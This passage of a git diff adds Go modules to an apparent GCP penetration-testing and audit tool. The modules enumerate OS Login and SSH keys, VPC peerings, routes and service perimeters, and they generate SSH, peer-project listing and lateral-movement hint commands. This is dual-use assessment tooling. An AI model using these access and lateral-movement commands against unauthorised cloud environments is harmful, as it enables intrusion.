instance.DisplayName, + Config: instance.Config, + NodeCount: instance.NodeCount, + State: instance.State, + } + + // Get databases for this instance + dbs, _ := s.listDatabases(service, ctx, instance.Name) + info.Databases = dbs + + instances = append(instances, info) + } + return nil + }) + if err != nil { + return nil, err + } + return instances, nil +} + +func (s *SpannerService) listDatabases(service *spanner.Service, ctx context.Context, instanceName string) ([]string, error) { + var databases []string + req := service.Projects.Instances.Databases.List(instanceName) + err := req.Pages(ctx, func(page *spanner.ListDatabasesResponse) error { + for _, db := range page.Databases { + databases = append(databases, extractName(db.Name)) + } + return nil + }) + return databases, err +} + +func extractName(fullName string) string { + parts := strings.Split(fullName, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return fullName +} diff --git a/gcp/services/sshOsLoginService/sshOsLoginService.go b/gcp/services/sshOsLoginService/sshOsLoginService.go new file mode 100644 index 00000000..b43c1118 --- /dev/null +++ b/gcp/services/sshOsLoginService/sshOsLoginService.go @@ -0,0 +1,377 @@ +package sshosloginservice + +import ( + "context" + "fmt" + "strings" + + compute "google.golang.org/api/compute/v1" + oslogin "google.golang.org/api/oslogin/v1" +) + +type SSHOsLoginService struct{} + +func New() *SSHOsLoginService { + return &SSHOsLoginService{} +} + +// OSLoginConfig represents the OS Login configuration for a project +type OSLoginConfig struct { + ProjectID string `json:"projectId"` + OSLoginEnabled bool `json:"osLoginEnabled"` + OSLogin2FAEnabled bool `json:"osLogin2FAEnabled"` + BlockProjectSSHKeys bool `json:"blockProjectSSHKeys"` + RiskLevel string `json:"riskLevel"` + RiskReasons []string `json:"riskReasons"` +} + +// SSHKeyInfo represents an SSH key in project or instance metadata +type SSHKeyInfo struct { + ProjectID string `json:"projectId"` + Username string `json:"username"` + KeyType string `json:"keyType"` // ssh-rsa, ssh-ed25519, etc. + KeyFingerprint string `json:"keyFingerprint"` + Source string `json:"source"` // project, instance + InstanceName string `json:"instanceName"` // If from instance metadata + Zone string `json:"zone"` + ExploitCommands []string `json:"exploitCommands"` +} + +// InstanceSSHAccess represents SSH access info for an instance +type InstanceSSHAccess struct { + InstanceName string `json:"instanceName"` + ProjectID string `json:"projectId"` + Zone string `json:"zone"` + ExternalIP string `json:"externalIP"` + InternalIP string `json:"internalIP"` + OSLoginEnabled bool `json:"osLoginEnabled"` + BlockProjectKeys bool `json:"blockProjectKeys"` + SSHKeysCount int `json:"sshKeysCount"` + ServiceAccount string `json:"serviceAccount"` + RiskLevel string `json:"riskLevel"` + RiskReasons []string `json:"riskReasons"` + SSHCommands []string `json:"sshCommands"` +} + +// OSLoginUser represents a user with OS Login access +type OSLoginUser struct { + Email string `json:"email"` + ProjectID string `json:"projectId"` + PosixAccounts []string `json:"posixAccounts"` + SSHPublicKeys int `json:"sshPublicKeys"` + CanSSH bool `json:"canSSH"` + CanSudo bool `json:"canSudo"` + RiskLevel string `json:"riskLevel"` + RiskReasons []string `json:"riskReasons"` +} + +// GetProjectOSLoginConfig retrieves OS Login configuration for a project +func (s *SSHOsLoginService) GetProjectOSLoginConfig(projectID string) (*OSLoginConfig, error) { + ctx := context.Background() + service, err := compute.NewService(ctx) + if err != nil { + return nil, fmt.Errorf("failed to create compute service: %v", err) + } + + config := &OSLoginConfig{ + ProjectID: projectID, + RiskReasons: []string{}, + } + + project, err := service.Projects.Get(projectID).Context(ctx).Do() + if err != nil { + return nil, fmt.Errorf("failed to get project: %v", err) + } + + // Check common instance metadata + if project.CommonInstanceMetadata != nil { + for _, item := range project.CommonInstanceMetadata.Items { + switch item.Key { + case "enable-oslogin": + if item.Value != nil && strings.ToLower(*item.Value) == "true" { + config.OSLoginEnabled = true + } + case "enable-oslogin-2fa": + if item.Value != nil && strings.ToLower(*item.Value) == "true" { + config.OSLogin2FAEnabled = true + } + case "block-project-ssh-keys": + if item.Value != nil && strings.ToLower(*item.Value) == "true" { + config.BlockProjectSSHKeys = true + } + } + } + } + + // Analyze risk + config.RiskLevel, config.RiskReasons = s.analyzeOSLoginRisk(config) + + return config, nil +} + +// GetProjectSSHKeys retrieves SSH keys from project metadata +func (s *SSHOsLoginService) GetProjectSSHKeys(projectID string) ([]SSHKeyInfo, error) { + ctx := context.Background() + service, err := compute.NewService(ctx) + if err != nil { + return nil, fmt.Errorf("failed to create compute service: %v", err) + } + + var keys []SSHKeyInfo + + project, err := service.Projects.Get(projectID).Context(ctx).Do() + if err != nil { + return nil, fmt.Errorf("failed to get project: %v", err) + } + + if project.CommonInstanceMetadata != nil { + for _, item := range project.CommonInstanceMetadata.Items { + if item.Key == "ssh-keys" && item.Value != nil { + parsedKeys := s.parseSSHKeys(*item.Value, projectID, "project", "", "") + keys = append(keys, parsedKeys...) + } + } + } + + return keys, nil +} + +// GetInstanceSSHAccess retrieves SSH access information for all instances +func (s *SSHOsLoginService) GetInstanceSSHAccess(projectID string) ([]InstanceSSHAccess, []SSHKeyInfo, error) { + ctx := context.Background() + service, err := compute.NewService(ctx) + if err != nil { + return nil, nil, fmt.Errorf("failed to create compute service: %v", err) + } + + var instances []InstanceSSHAccess + var instanceKeys []SSHKeyInfo + + req := service.Instances.AggregatedList(projectID) + err = req.Pages(ctx, func(page *compute.InstanceAggregatedList) error { + for zone, scopedList := range page.Items { + zoneName := zone + if strings.HasPrefix(zone, "zones/") { + zoneName = strings.TrimPrefix(zone, "zones/") + } + + for _, instance := range scopedList.Instances { + access := InstanceSSHAccess{ + InstanceName: instance.Name, + ProjectID: projectID, + Zone: zoneName, + RiskReasons: []string{}, + SSHCommands: []string{}, + } + + // Get IPs + for _, nic := range instance.NetworkInterfaces { + if access.InternalIP == "" { + access.InternalIP = nic.NetworkIP + } + for _, accessConfig := range nic.AccessConfigs { + if accessConfig.NatIP != "" { + access.ExternalIP = accessConfig.NatIP + } + } + } + + // Get service account + if len(instance.ServiceAccounts) > 0 { + access.ServiceAccount = instance.ServiceAccounts[0].Email + } + + // Check instance metadata + if instance.Metadata != nil { + for _, item := range instance.Metadata.Items { + switch item.Key { + case "enable-oslogin": + if item.Value != nil && strings.ToLower(*item.Value) == "true" { + access.OSLoginEnabled = true + } + case "block-project-ssh-keys": + if item.Value != nil && strings.ToLower(*item.Value) == "true" { + access.BlockProjectKeys = true + } + case "ssh-keys": + if item.Value != nil { + keys := s.parseSSHKeys(*item.Value, projectID, "instance", instance.Name, zoneName) + instanceKeys = append(instanceKeys, keys...) + access.SSHKeysCount = len(keys) + } + } + } + } + + // Generate SSH commands + access.SSHCommands = s.generateSSHCommands(access) + + // Analyze risk + access.RiskLevel, access.RiskReasons = s.analyzeInstanceSSHRisk(access) + + instances = append(instances, access) + } + } + return nil + }) + + return instances, instanceKeys, err +} + +// GetOSLoginUsers gets users with OS Login access (requires oslogin API) +func (s *SSHOsLoginService) GetOSLoginUsers(projectID string) ([]OSLoginUser, error) { + ctx := context.Background() + _, err := oslogin.NewService(ctx) + if err != nil { + return nil, fmt.Errorf("failed to create oslogin service: %v", err) + } + + // Note: OS Login API requires querying per-user, so we return empty + // The actual users would need to be enumerated from IAM bindings with + // roles/compute.osLogin, roles/compute.osAdminLogin, roles/compute.osLoginExternalUser + + return []OSLoginUser{}, nil +} + +func (s *SSHOsLoginService) parseSSHKeys(sshKeysValue, projectID, source, instanceName, zone string) []SSHKeyInfo { + var keys []SSHKeyInfo + + lines := strings.Split(sshKeysValue, "\n") + for _, line := range lines { + line = strings.TrimSpace(line) + if line == "" || strings.HasPrefix(line, "#") { + continue + } + + // Format: username:ssh-rsa AAAAB3... comment + // or: ssh-rsa AAAAB3... username + parts := strings.SplitN(line, ":", 2) + + var username, keyData string + if len(parts) == 2 { + username = parts[0] + keyData = parts[1] + } else { + keyData = line + } + + keyParts := strings.Fields(keyData) + if len(keyParts) < 2 { + continue + } + + keyType := keyParts[0] + if username == "" && len(keyParts) >= 3 { + username = keyParts[2] + } + + key := SSHKeyInfo{ + ProjectID: projectID, + Username: username, + KeyType: keyType, + Source: source, + InstanceName: instanceName, + Zone: zone, + } + + // Generate SSH commands + if source == "instance" && instanceName != "" { + key.ExploitCommands = []string{ + fmt.Sprintf("# SSH as %s to instance %s:", username, instanceName), + fmt.Sprintf("gcloud compute ssh %s@%s --zone=%s --project=%s", username, instanceName, zone, projectID), + } + } else { + key.ExploitCommands = []string{ + fmt.Sprintf("# Project-wide SSH key for user: %s", username), + fmt.Sprintf("# This key grants access to all instances not blocking project keys"), + } + } + + keys = append(keys, key) + } + + return keys +} + +func (s *SSHOsLoginService) generateSSHCommands(access InstanceSSHAccess) []string { + var commands []string + + commands = append(commands, + fmt.Sprintf("# SSH to instance %s:", access.InstanceName)) + + // gcloud command + commands = append(commands, + fmt.Sprintf("gcloud compute ssh %s --zone=%s --project=%s", access.InstanceName, access.Zone, access.ProjectID)) + + // Direct SSH if external IP + if access.ExternalIP != "" { + commands = append(commands, + fmt.Sprintf("# Direct SSH (if key is authorized):\nssh -i ~/.ssh/google_compute_engine %s", access.ExternalIP)) + } + + // IAP tunnel if no external IP + if access.ExternalIP == "" { + commands = append(commands, + fmt.Sprintf("# Via IAP tunnel (no external IP):\ngcloud compute ssh %s --zone=%s --project=%s --tunnel-through-iap", access.InstanceName, access.Zone, access.ProjectID)) + } + + return commands +} + +func (s *SSHOsLoginService) analyzeOSLoginRisk(config *OSLoginConfig) (string, []string) { + var reasons []string + score := 0 + + if !config.OSLoginEnabled { + reasons = append(reasons, "OS Login not enabled - using legacy SSH keys") + score += 2 + } + + if config.OSLoginEnabled && !config.OSLogin2FAEnabled { + reasons = append(reasons, "OS Login enabled but 2FA not required") + score += 1 + } + + if !config.BlockProjectSSHKeys && !config.OSLoginEnabled { + reasons = append(reasons, "Project-wide SSH keys allowed") + score += 1 + } + + if score >= 3 { + return "HIGH", reasons + } else if score >= 2 { + return "MEDIUM", reasons + } else if score >= 1 { + return "LOW", reasons + } + return "INFO", reasons +} + +func (s *SSHOsLoginService) analyzeInstanceSSHRisk(access InstanceSSHAccess) (string, []string) { + var reasons []string + score := 0 + + if access.ExternalIP != "" && !access.OSLoginEnabled { + reasons = append(reasons, "External IP with legacy SSH keys") + score += 2 + } + + if access.SSHKeysCount > 5 { + reasons = append(reasons, fmt.Sprintf("Many SSH keys configured (%d)", access.SSHKeysCount)) + score += 1 + } + + if !access.BlockProjectKeys && !access.OSLoginEnabled { + reasons = append(reasons, "Accepts project-wide SSH keys") + score += 1 + } + + if score >= 3 { + return "HIGH", reasons + } else if score >= 2 { + return "MEDIUM", reasons + } else if score >= 1 { + return "LOW", reasons + } + return "INFO", reasons +} diff --git a/gcp/services/vpcService/vpcService.go b/gcp/services/vpcService/vpcService.go new file mode 100644 index 00000000..0d08a597 --- /dev/null +++ b/gcp/services/vpcService/vpcService.go @@ -0,0 +1,493 @@ +package vpcservice + +import ( + "context" + "fmt" + "strings" + + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + compute "google.golang.org/api/compute/v1" +) + +type VPCService struct { + session *gcpinternal.SafeSession +} + +func New() *VPCService { + return &VPCService{} +} + +func NewWithSession(session *gcpinternal.SafeSession) *VPCService { + return &VPCService{session: session} +} + +// VPCNetworkInfo represents a VPC network +type VPCNetworkInfo struct { + Name string `json:"name"` + ProjectID string `json:"projectId"` + Description string `json:"description"` + AutoCreateSubnetworks bool `json:"autoCreateSubnetworks"` + RoutingMode string `json:"routingMode"` // REGIONAL or GLOBAL + MTU int64 `json:"mtu"` + Subnetworks []string `json:"subnetworks"` + Peerings []string `json:"peerings"` + FirewallPolicyCount int `json:"firewallPolicyCount"` + RiskLevel string `json:"riskLevel"` + RiskReasons []string `json:"riskReasons"` +} + +// SubnetInfo represents a subnetwork +type SubnetInfo struct { + Name string `json:"name"` + ProjectID string `json:"projectId"` + Network string `json:"network"` + Region string `json:"region"` + IPCidrRange string `json:"ipCidrRange"` + GatewayAddress string `json:"gatewayAddress"` + PrivateIPGoogleAccess bool `json:"privateIpGoogleAccess"` + Purpose string `json:"purpose"` + EnableFlowLogs bool `json:"enableFlowLogs"` + SecondaryIPRanges []string `json:"secondaryIpRanges"` + RiskLevel string `json:"riskLevel"` + RiskReasons []string `json:"riskReasons"` +} + +// VPCPeeringInfo represents a VPC peering connection +type VPCPeeringInfo struct { + Name string `json:"name"` + ProjectID string `json:"projectId"` + Network string `json:"network"` + PeerNetwork string `json:"peerNetwork"` + PeerProjectID string `json:"peerProjectId"` + State string `json:"state"` + ExportCustomRoutes bool `json:"exportCustomRoutes"` + ImportCustomRoutes bool `json:"importCustomRoutes"` + ExchangeSubnetRoutes bool `json:"exchangeSubnetRoutes"` + RiskLevel string `json:"riskLevel"` + RiskReasons []string `json:"riskReasons"` + LateralMovementPath bool `json:"lateralMovementPath"` + ExploitCommands []string `json:"exploitCommands"` +} + +// RouteInfo represents a route +type RouteInfo struct { + Name string `json:"name"` + ProjectID string `json:"projectId"` + Network string `json:"network"` + DestRange string `json:"destRange"` + NextHopType string `json:"nextHopType"` + NextHop string `json:"nextHop"` + Priority int64 `json:"priority"` + Tags []string `json:"tags"` + RiskLevel string `json:"riskLevel"` + RiskReasons []string `json:"riskReasons"` +} + +// ListVPCNetworks retrieves all VPC networks +func (s *VPCService) ListVPCNetworks(projectID string) ([]VPCNetworkInfo, error) { + ctx := context.Background() + var service *compute.Service + var err error + + if s.session != nil { + service, err = compute.NewService(ctx, s.session.GetClientOption()) + } else { + service, err = compute.NewService(ctx) + } + if err != nil { + return nil, fmt.Errorf("failed to create Compute service: %v", err) + } + + var networks []VPCNetworkInfo + + resp, err := service.Networks.List(projectID).Context(ctx).Do() + if err != nil { + return nil, fmt.Errorf("failed to list VPC networks: %v", err) + } + + for _, network := range resp.Items { + info := s.parseNetwork(network, projectID) + networks = append(networks, info) + } + + return networks, nil +} + +// ListSubnets retrieves all subnets +func (s *VPCService) ListSubnets(projectID string) ([]SubnetInfo, error) { + ctx := context.Background() + var service *compute.Service + var err error + + if s.session != nil { + service, err = compute.NewService(ctx, s.session.GetClientOption()) + } else { + service, err = compute.NewService(ctx) + } + if err != nil { + return nil, fmt.Errorf("failed to create Compute service: %v", err) + } + + var subnets []SubnetInfo + + req := service.Subnetworks.AggregatedList(projectID) + err = req.Pages(ctx, func(page *compute.SubnetworkAggregatedList) error { + for _, scopedList := range page.Items { + for _, subnet := range scopedList.Subnetworks { + info := s.parseSubnet(subnet, projectID) + subnets = append(subnets, info) + } + } + return nil + }) + if err != nil { + return nil, fmt.Errorf("failed to list subnets: %v", err) + } + + return subnets, nil +} + +// ListVPCPeerings retrieves all VPC peering connections +func (s *VPCService) ListVPCPeerings(projectID string) ([]VPCPeeringInfo, error) { + ctx := context.Background() + var service *compute.Service + var err error + + if s.session != nil { + service, err = compute.NewService(ctx, s.session.GetClientOption()) + } else { + service, err = compute.NewService(ctx) + } + if err != nil { + return nil, fmt.Errorf("failed to create Compute service: %v", err) + } + + var peerings []VPCPeeringInfo + + networks, err := service.Networks.List(projectID).Context(ctx).Do() + if err != nil { + return nil, fmt.Errorf("failed to list networks: %v", err) + } + + for _, network := range networks.Items { + for _, peering := range network.Peerings { + // Extract peer project ID from the full network path + peerProjectID := extractProjectFromNetwork(peering.Network) + + info := VPCPeeringInfo{ + Name: peering.Name, + ProjectID: projectID, + Network: network.Name, + PeerNetwork: extractName(peering.Network), + PeerProjectID: peerProjectID, + State: peering.State, + ExportCustomRoutes: peering.ExportCustomRoutes, + ImportCustomRoutes: peering.ImportCustomRoutes, + ExchangeSubnetRoutes: peering.ExchangeSubnetRoutes, + RiskReasons: []string{}, + ExploitCommands: []string{}, + } + info.RiskLevel, info.RiskReasons, info.LateralMovementPath = s.analyzePeeringRisk(info) + info.ExploitCommands = s.generatePeeringExploitCommands(info) + peerings = append(peerings, info) + } + } + + return peerings, nil +} + +// ListRoutes retrieves all routes +func (s *VPCService) ListRoutes(projectID string) ([]RouteInfo, error) { + ctx := context.Background() + var service *compute.Service + var err error + + if s.session != nil { + service, err = compute.NewService(ctx, s.session.GetClientOption()) + } else { + service, err = compute.NewService(ctx) + } + if err != nil { + return nil, fmt.Errorf("failed to create Compute service: %v", err) + } + + var routes []RouteInfo + + resp, err := service.Routes.List(projectID).Context(ctx).Do() + if err != nil { + return nil, fmt.Errorf("failed to list routes: %v", err) + } + + for _, route := range resp.Items { + info := s.parseRoute(route, projectID) + routes = append(routes, info) + } + + return routes, nil +} + +func (s *VPCService) parseNetwork(network *compute.Network, projectID string) VPCNetworkInfo { + info := VPCNetworkInfo{ + Name: network.Name, + ProjectID: projectID, + Description: network.Description, + AutoCreateSubnetworks: network.AutoCreateSubnetworks, + RoutingMode: network.RoutingConfig.RoutingMode, + MTU: network.Mtu, + RiskReasons: []string{}, + } + + for _, subnet := range network.Subnetworks { + info.Subnetworks = append(info.Subnetworks, extractName(subnet)) + } + + for _, peering := range network.Peerings { + info.Peerings = append(info.Peerings, peering.Name) + } + + info.RiskLevel, info.RiskReasons = s.analyzeNetworkRisk(info) + + return info +} + +func (s *VPCService) parseSubnet(subnet *compute.Subnetwork, projectID string) SubnetInfo { + info := SubnetInfo{ + Name: subnet.Name, + ProjectID: projectID, + Network: extractName(subnet.Network), + Region: extractRegion(subnet.Region), + IPCidrRange: subnet.IpCidrRange, + GatewayAddress: subnet.GatewayAddress, + PrivateIPGoogleAccess: subnet.PrivateIpGoogleAccess, + Purpose: subnet.Purpose, + RiskReasons: []string{}, + } + + if subnet.LogConfig != nil { + info.EnableFlowLogs = subnet.LogConfig.Enable + } + + for _, secondary := range subnet.SecondaryIpRanges { + info.SecondaryIPRanges = append(info.SecondaryIPRanges, fmt.Sprintf("%s:%s", secondary.RangeName, secondary.IpCidrRange)) + } + + info.RiskLevel, info.RiskReasons = s.analyzeSubnetRisk(info) + + return info +} + +func (s *VPCService) parseRoute(route *compute.Route, projectID string) RouteInfo { + info := RouteInfo{ + Name: route.Name, + ProjectID: projectID, + Network: extractName(route.Network), + DestRange: route.DestRange, + Priority: route.Priority, + Tags: route.Tags, + RiskReasons: []string{}, + } + + // Determine next hop type + if route.NextHopGateway != "" { + info.NextHopType = "gateway" + info.NextHop = extractName(route.NextHopGateway) + } else if route.NextHopInstance != "" { + info.NextHopType = "instance" + info.NextHop = extractName(route.NextHopInstance) + } else if route.NextHopIp != "" { + info.NextHopType = "ip" + info.NextHop = route.NextHopIp + } else if route.NextHopNetwork != "" { + info.NextHopType = "network" + info.NextHop = extractName(route.NextHopNetwork) + } else if route.NextHopPeering != "" { + info.NextHopType = "peering" + info.NextHop = route.NextHopPeering + } else if route.NextHopIlb != "" { + info.NextHopType = "ilb" + info.NextHop = extractName(route.NextHopIlb) + } else if route.NextHopVpnTunnel != "" { + info.NextHopType = "vpn_tunnel" + info.NextHop = extractName(route.NextHopVpnTunnel) + } + + info.RiskLevel, info.RiskReasons = s.analyzeRouteRisk(info) + + return info +} + +func (s *VPCService) analyzeNetworkRisk(network VPCNetworkInfo) (string, []string) { + var reasons []string + score := 0 + + // Auto-create subnetworks can be less controlled + if network.AutoCreateSubnetworks { + reasons = append(reasons, "Auto-create subnetworks enabled") + score += 1 + } + + // Has peerings (potential lateral movement path) + if len(network.Peerings) > 0 { + reasons = append(reasons, fmt.Sprintf("Has %d VPC peering(s)", len(network.Peerings))) + score += 1 + } + + if score >= 2 { + return "MEDIUM", reasons + } else if score >= 1 { + return "LOW", reasons + } + return "INFO", reasons +} + +func (s *VPCService) analyzeSubnetRisk(subnet SubnetInfo) (string, []string) { + var reasons []string + score := 0 + + // No Private Google Access + if !subnet.PrivateIPGoogleAccess { + reasons = append(reasons, "Private Google Access not enabled") + score += 1 + } + + // No flow logs + if !subnet.EnableFlowLogs { + reasons = append(reasons, "VPC Flow Logs not enabled") + score += 1 + } + + if score >= 2 { + return "MEDIUM", reasons + } else if score >= 1 { + return "LOW", reasons + } + return "INFO", reasons +} + +func (s *VPCService) analyzePeeringRisk(peering VPCPeeringInfo) (string, []string, bool) { + var reasons []string + score := 0 + lateralMovement := false + + // Exports custom routes (potential route leakage) + if peering.ExportCustomRoutes { + reasons = append(reasons, "Exports custom routes to peer") + score += 1 + } + + // Imports custom routes + if peering.ImportCustomRoutes { + reasons = append(reasons, "Imports custom routes from peer") + score += 1 + } + + // Cross-project peering - lateral movement opportunity + if peering.PeerProjectID != "" && peering.PeerProjectID != peering.ProjectID { + reasons = append(reasons, fmt.Sprintf("Cross-project peering to %s", peering.PeerProjectID)) + lateralMovement = true + score += 2 + } + + // Exchange subnet routes - full network visibility + if peering.ExchangeSubnetRoutes { + reasons = append(reasons, "Exchanges subnet routes (full network reachability)") + lateralMovement = true + score += 1 + } + + // Active peering + if peering.State == "ACTIVE" && lateralMovement { + reasons = append(reasons, "Active peering enables lateral movement") + score += 1 + } + + if score >= 3 { + return "HIGH", reasons, lateralMovement + } else if score >= 2 { + return "MEDIUM", reasons, lateralMovement + } else if score >= 1 { + return "LOW", reasons, lateralMovement + } + return "INFO", reasons, lateralMovement +} + +func (s *VPCService) generatePeeringExploitCommands(peering VPCPeeringInfo) []string { + var commands []string + + if peering.State != "ACTIVE" { + return commands + } + + commands = append(commands, + fmt.Sprintf("# VPC Peering: %s -> %s", peering.Network, peering.PeerNetwork)) + + if peering.PeerProjectID != "" && peering.PeerProjectID != peering.ProjectID { + commands = append(commands, + fmt.Sprintf("# Target project: %s", peering.PeerProjectID), + fmt.Sprintf("# List instances in peer project:\ngcloud compute instances list --project=%s", peering.PeerProjectID), + fmt.Sprintf("# List subnets in peer project:\ngcloud compute networks subnets list --project=%s", peering.PeerProjectID)) + } + + if peering.ExchangeSubnetRoutes { + commands = append(commands, + "# Network scan from compromised instance in this VPC:", + "# nmap -sn ", + "# Can reach resources in peered VPC via internal IPs") + } + + return commands +} + +func extractProjectFromNetwork(networkPath string) string { + // Format: https://www.googleapis.com/compute/v1/projects/{project}/global/networks/{network} + // or: projects/{project}/global/networks/{network} + parts := strings.Split(networkPath, "/") + for i, part := range parts { + if part == "projects" && i+1 < len(parts) { + return parts[i+1] + } + } + return "" +} + +func (s *VPCService) analyzeRouteRisk(route RouteInfo) (string, []string) { + var reasons []string + score := 0 + + // Route to 0.0.0.0/0 via instance (NAT instance) + if route.DestRange == "0.0.0.0/0" && route.NextHopType == "instance" { + reasons = append(reasons, "Default route via instance (NAT instance)") + score += 1 + } + + // Route to specific external IP via instance + if route.NextHopType == "ip" { + reasons = append(reasons, "Route to specific IP address") + score += 1 + } + + if score >= 2 { + return "MEDIUM", reasons + } else if score >= 1 { + return "LOW", reasons + } + return "INFO", reasons +} + +func extractName(fullPath string) string { + parts := strings.Split(fullPath, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return fullPath +} + +func extractRegion(fullPath string) string { + parts := strings.Split(fullPath, "/") + for i, part := range parts { + if part == "regions" && i+1 < len(parts) { + return parts[i+1] + } + } + return fullPath +} diff --git a/gcp/services/vpcscService/vpcscService.go b/gcp/services/vpcscService/vpcscService.go new file mode 100644 index 00000000..4134d44a --- /dev/null +++ b/gcp/services/vpcscService/vpcscService.go @@ -0,0 +1,346 @@ +package vpcscservice + +import ( + "context" + "fmt" + "strings" + + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + accesscontextmanager "google.golang.org/api/accesscontextmanager/v1" +) + +type VPCSCService struct { + session *gcpinternal.SafeSession +} + +func New() *VPCSCService { + return &VPCSCService{} +} + +func NewWithSession(session *gcpinternal.SafeSession) *VPCSCService { + return &VPCSCService{session: session} +} + +// AccessPolicyInfo represents an access policy +type AccessPolicyInfo struct { + Name string `json:"name"` + Title string `json:"title"` + Parent string `json:"parent"` + Etag string `json:"etag"` + CreateTime string `json:"createTime"` + UpdateTime string `json:"updateTime"` +} + +// ServicePerimeterInfo represents a VPC Service Control perimeter +type ServicePerimeterInfo struct { + Name string `json:"name"` + Title string `json:"title"` + PolicyName string `json:"policyName"` + PerimeterType string `json:"perimeterType"` // PERIMETER_TYPE_REGULAR or PERIMETER_TYPE_BRIDGE + Description string `json:"description"` + CreateTime string `json:"createTime"` + UpdateTime string `json:"updateTime"` + + // Status configuration + Resources []string `json:"resources"` // Projects in the perimeter + RestrictedServices []string `json:"restrictedServices"` // Services protected + AccessLevels []string `json:"accessLevels"` // Access levels allowed + VPCAccessibleServices []string `json:"vpcAccessibleServices"` + + // Ingress/Egress policies + IngressPolicyCount int `json:"ingressPolicyCount"` + EgressPolicyCount int `json:"egressPolicyCount"` + HasIngressRules bool `json:"hasIngressRules"` + HasEgressRules bool `json:"hasEgressRules"` + + // Security analysis + RiskLevel string `json:"riskLevel"` + RiskReasons []string `json:"riskReasons"` +} + +// AccessLevelInfo represents an access level +type AccessLevelInfo struct { + Name string `json:"name"` + Title string `json:"title"` + PolicyName string `json:"policyName"` + Description string `json:"description"` + CreateTime string `json:"createTime"` + UpdateTime string `json:"updateTime"` + + // Conditions + IPSubnetworks []string `json:"ipSubnetworks"` + Regions []string `json:"regions"` + Members []string `json:"members"` + + // Security analysis + RiskLevel string `json:"riskLevel"` + RiskReasons []string `json:"riskReasons"` +} + +// ListAccessPolicies retrieves all access policies for an organization +func (s *VPCSCService) ListAccessPolicies(orgID string) ([]AccessPolicyInfo, error) { + ctx := context.Background() + var service *accesscontextmanager.Service + var err error + + if s.session != nil { + service, err = accesscontextmanager.NewService(ctx, s.session.GetClientOption()) + } else { + service, err = accesscontextmanager.NewService(ctx) + } + if err != nil { + return nil, fmt.Errorf("failed to create Access Context Manager service: %v", err) + } + + var policies []AccessPolicyInfo + + // List access policies for the organization + parent := fmt.Sprintf("organizations/%s", orgID) + req := service.AccessPolicies.List().Parent(parent) + err = req.Pages(ctx, func(page *accesscontextmanager.ListAccessPoliciesResponse) error { + for _, policy := range page.AccessPolicies { + info := AccessPolicyInfo{ + Name: extractPolicyName(policy.Name), + Title: policy.Title, + Parent: policy.Parent, + Etag: policy.Etag, + } + policies = append(policies, info) + } + return nil + }) + if err != nil { + return nil, fmt.Errorf("failed to list access policies: %v", err) + } + + return policies, nil +} + +// ListServicePerimeters retrieves all service perimeters for an access policy +func (s *VPCSCService) ListServicePerimeters(policyName string) ([]ServicePerimeterInfo, error) { + ctx := context.Background() + var service *accesscontextmanager.Service + var err error + + if s.session != nil { + service, err = accesscontextmanager.NewService(ctx, s.session.GetClientOption()) + } else { + service, err = accesscontextmanager.NewService(ctx) + } + if err != nil { + return nil, fmt.Errorf("failed to create Access Context Manager service: %v", err) + } + + var perimeters []ServicePerimeterInfo + + parent := fmt.Sprintf("accessPolicies/%s", policyName) + req := service.AccessPolicies.ServicePerimeters.List(parent) + err = req.Pages(ctx, func(page *accesscontextmanager.ListServicePerimetersResponse) error { + for _, perimeter := range page.ServicePerimeters { + info := s.parsePerimeter(perimeter, policyName) + perimeters = append(perimeters, info) + } + return nil + }) + if err != nil { + return nil, fmt.Errorf("failed to list service perimeters: %v", err) + } + + return perimeters, nil +} + +// ListAccessLevels retrieves all access levels for an access policy +func (s *VPCSCService) ListAccessLevels(policyName string) ([]AccessLevelInfo, error) { + ctx := context.Background() + var service *accesscontextmanager.Service + var err error + + if s.session != nil { + service, err = accesscontextmanager.NewService(ctx, s.session.GetClientOption()) + } else { + service, err = accesscontextmanager.NewService(ctx) + } + if err != nil { + return nil, fmt.Errorf("failed to create Access Context Manager service: %v", err) + } + + var levels []AccessLevelInfo + + parent := fmt.Sprintf("accessPolicies/%s", policyName) + req := service.AccessPolicies.AccessLevels.List(parent) + err = req.Pages(ctx, func(page *accesscontextmanager.ListAccessLevelsResponse) error { + for _, level := range page.AccessLevels { + info := s.parseAccessLevel(level, policyName) + levels = append(levels, info) + } + return nil + }) + if err != nil { + return nil, fmt.Errorf("failed to list access levels: %v", err) + } + + return levels, nil +} + +func (s *VPCSCService) parsePerimeter(perimeter *accesscontextmanager.ServicePerimeter, policyName string) ServicePerimeterInfo { + info := ServicePerimeterInfo{ + Name: extractPerimeterName(perimeter.Name), + Title: perimeter.Title, + PolicyName: policyName, + PerimeterType: perimeter.PerimeterType, + Description: perimeter.Description, + RiskReasons: []string{}, + } + + // Parse status configuration + if perimeter.Status != nil { + info.Resources = perimeter.Status.Resources + info.RestrictedServices = perimeter.Status.RestrictedServices + info.AccessLevels = perimeter.Status.AccessLevels + + if perimeter.Status.VpcAccessibleServices != nil { + info.VPCAccessibleServices = perimeter.Status.VpcAccessibleServices.AllowedServices + } + + if len(perimeter.Status.IngressPolicies) > 0 { + info.IngressPolicyCount = len(perimeter.Status.IngressPolicies) + info.HasIngressRules = true + } + + if len(perimeter.Status.EgressPolicies) > 0 { + info.EgressPolicyCount = len(perimeter.Status.EgressPolicies) + info.HasEgressRules = true + } + } + + info.RiskLevel, info.RiskReasons = s.analyzePerimeterRisk(info) + + return info +} + +func (s *VPCSCService) parseAccessLevel(level *accesscontextmanager.AccessLevel, policyName string) AccessLevelInfo { + info := AccessLevelInfo{ + Name: extractLevelName(level.Name), + Title: level.Title, + PolicyName: policyName, + Description: level.Description, + RiskReasons: []string{}, + } + + if level.Basic != nil && len(level.Basic.Conditions) > 0 { + for _, condition := range level.Basic.Conditions { + info.IPSubnetworks = append(info.IPSubnetworks, condition.IpSubnetworks...) + info.Regions = append(info.Regions, condition.Regions...) + info.Members = append(info.Members, condition.Members...) + } + } + + info.RiskLevel, info.RiskReasons = s.analyzeAccessLevelRisk(info) + + return info +} + +func (s *VPCSCService) analyzePerimeterRisk(perimeter ServicePerimeterInfo) (string, []string) { + var reasons []string + score := 0 + + // No restricted services + if len(perimeter.RestrictedServices) == 0 { + reasons = append(reasons, "No services are restricted by perimeter") + score += 2 + } + + // Permissive ingress rules + if perimeter.HasIngressRules { + reasons = append(reasons, fmt.Sprintf("Has %d ingress policies (review for overly permissive rules)", perimeter.IngressPolicyCount)) + score += 1 + } + + // Permissive egress rules + if 